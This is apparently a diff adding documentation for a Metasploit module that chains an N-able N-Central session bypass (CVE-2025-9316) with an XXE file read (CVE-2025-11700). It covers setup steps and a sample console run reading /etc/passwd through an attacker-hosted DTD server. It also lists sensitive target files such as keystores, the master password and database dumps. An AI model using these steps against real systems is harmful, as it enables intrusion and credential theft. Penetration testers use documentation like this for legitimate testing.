|
| 1 | +## Vulnerable Application |
| 2 | + |
| 3 | +This module targets N-able N-Central instances affected by CVE-2025-9316 (Unauthenticated Session Bypass) and CVE-2025-11700 (XXE). |
| 4 | + |
| 5 | +Affected versions: N-Central < 2025.4.0.9 |
| 6 | + |
| 7 | +### Installation |
| 8 | + |
| 9 | +N-able N-Central is a commercial RMM (Remote Monitoring and Management) platform. To obtain a vulnerable version for testing: |
| 10 | + |
| 11 | +1. Contact N-able support or your account representative to request an evaluation copy |
| 12 | +2. Download the installation package from the N-able customer portal |
| 13 | +3. Follow the official installation guide provided by N-able |
| 14 | +4. Ensure the installation is version < 2025.4.0.9 to be vulnerable |
| 15 | + |
| 16 | +Note: This module requires an HTTP server to host the XXE DTD file. |
| 17 | +For WAN testing, you need to expose the DTD server to the internet |
| 18 | +(e.g., using ngrok). |
| 19 | + |
| 20 | +## Verification Steps |
| 21 | + |
| 22 | +1. Start msfconsole |
| 23 | +1. Do: `use auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe` |
| 24 | +1. Do: `set RHOSTS <target_ip>` |
| 25 | +1. Do: `set RPORT 443` |
| 26 | +1. Do: `run` |
| 27 | +1. You should see the module obtain a session ID and read the target file via XXE |
| 28 | + |
| 29 | +## Options |
| 30 | + |
| 31 | +### APPLIANCE_ID |
| 32 | + |
| 33 | +Appliance ID range to test (default: `1-30`). The module will iterate through this range to find a valid appliance ID that allows |
| 34 | +session creation. |
| 35 | + |
| 36 | +### FILE |
| 37 | + |
| 38 | +File to read via XXE (default: `/etc/passwd`). |
| 39 | + |
| 40 | +## Files of Interest |
| 41 | + |
| 42 | +Examples of interesting files that can be read via XXE: |
| 43 | + |
| 44 | +- `/etc/passwd` - User accounts |
| 45 | +- `/opt/nable/var/ncsai/etc/ncbackup.conf` - N-Central backup configuration |
| 46 | +- `/var/opt/n-central/tmp/ncbackup/ncbackup.bin` - PostgreSQL dump file |
| 47 | +- `/opt/nable/etc/keystore.bcfks` - Encrypted keystore file |
| 48 | +- `/opt/nable/etc/masterPassword` - Keystore password |
| 49 | + |
| 50 | +### LOG_PATH |
| 51 | + |
| 52 | +Directory path where the log file is written (default: `/opt/nable/webapps/ROOT/applianceLog`). |
| 53 | +The module writes the XXE payload to a log file in this directory before triggering it. |
| 54 | + |
| 55 | +## Scenarios |
| 56 | + |
| 57 | +### Local Network Testing |
| 58 | + |
| 59 | +When the target N-Central server is on the same network or can reach your machine: |
| 60 | + |
| 61 | +``` |
| 62 | +msf6 > use auxiliary/scanner/http/nable_ncentral_auth_bypass_xxe |
| 63 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > set RHOSTS 192.168.1.100 |
| 64 | +RHOSTS => 192.168.1.100 |
| 65 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > set RPORT 443 |
| 66 | +RPORT => 443 |
| 67 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > set SRVHOST 192.168.1.50 |
| 68 | +SRVHOST => 192.168.1.50 |
| 69 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > set SRVPORT 8080 |
| 70 | +SRVPORT => 8080 |
| 71 | +msf6 auxiliary(scanner/http/nable_ncentral_auth_bypass_xxe) > run |
| 72 | +
|
| 73 | +[*] Using URL: http://192.168.1.50:8080/ |
| 74 | +[*] Started XXE DTD server on 192.168.1.50:8080 |
| 75 | +[*] Scanning 192.168.1.100:443 for N-Central vulnerabilities |
| 76 | +[*] Testing appliance ID: 1 |
| 77 | +[*] Testing appliance ID: 2 |
| 78 | +[*] Testing appliance ID: 3 |
| 79 | +[+] 192.168.1.100:443 - Vulnerable to CVE-2025-9316 (Authentication Bypass) |
| 80 | +[+] 192.168.1.100:443 - Obtained session ID: 1234567890 (appliance ID: 3) |
| 81 | +[*] Testing CVE-2025-11700 (XXE) with session ID: 1234567890 (target file: /etc/passwd) |
| 82 | +[*] DTD requested from 192.168.1.100 |
| 83 | +[+] 192.168.1.100:443 - XXE file read succeeded (CVE-2025-11700) |
| 84 | +[+] File contents: |
| 85 | +
|
| 86 | +root:x:0:0:root:/root:/bin/bash |
| 87 | +bin:x:1:1:bin:/bin:/sbin/nologin |
| 88 | +daemon:x:2:2:daemon:/sbin:/sbin/nologin |
| 89 | +... |
| 90 | +[*] Scanned 1 of 1 hosts (100% complete) |
| 91 | +[*] Server stopped. |
| 92 | +``` |
| 93 | + |
| 94 | +### WAN Testing with ngrok |
| 95 | + |
| 96 | +For testing against targets on the internet, expose your DTD server using ngrok: |
| 97 | + |
| 98 | +1. Start ngrok: `ngrok http 8080` |
| 99 | +2. Configure `SRVHOST` to your ngrok hostname and `SRVPORT` to your ngrok port |
| 100 | + |
| 101 | + |
| 102 | +## Troubleshooting |
| 103 | + |
| 104 | +- **"Unexpected end of file from server"**: The target cannot reach your DTD server. Check firewall rules and ngrok configuration if using |
| 105 | + a tunnel. |
| 106 | +- **"Session already exists"**: Some appliance IDs may be temporarily unavailable. The module will try other IDs automatically. |
| 107 | +- **No session ID obtained**: Try expanding the `APPLIANCE_ID` range or verify the target is vulnerable (N-Central < 2025.4.0.9). |
0 commit comments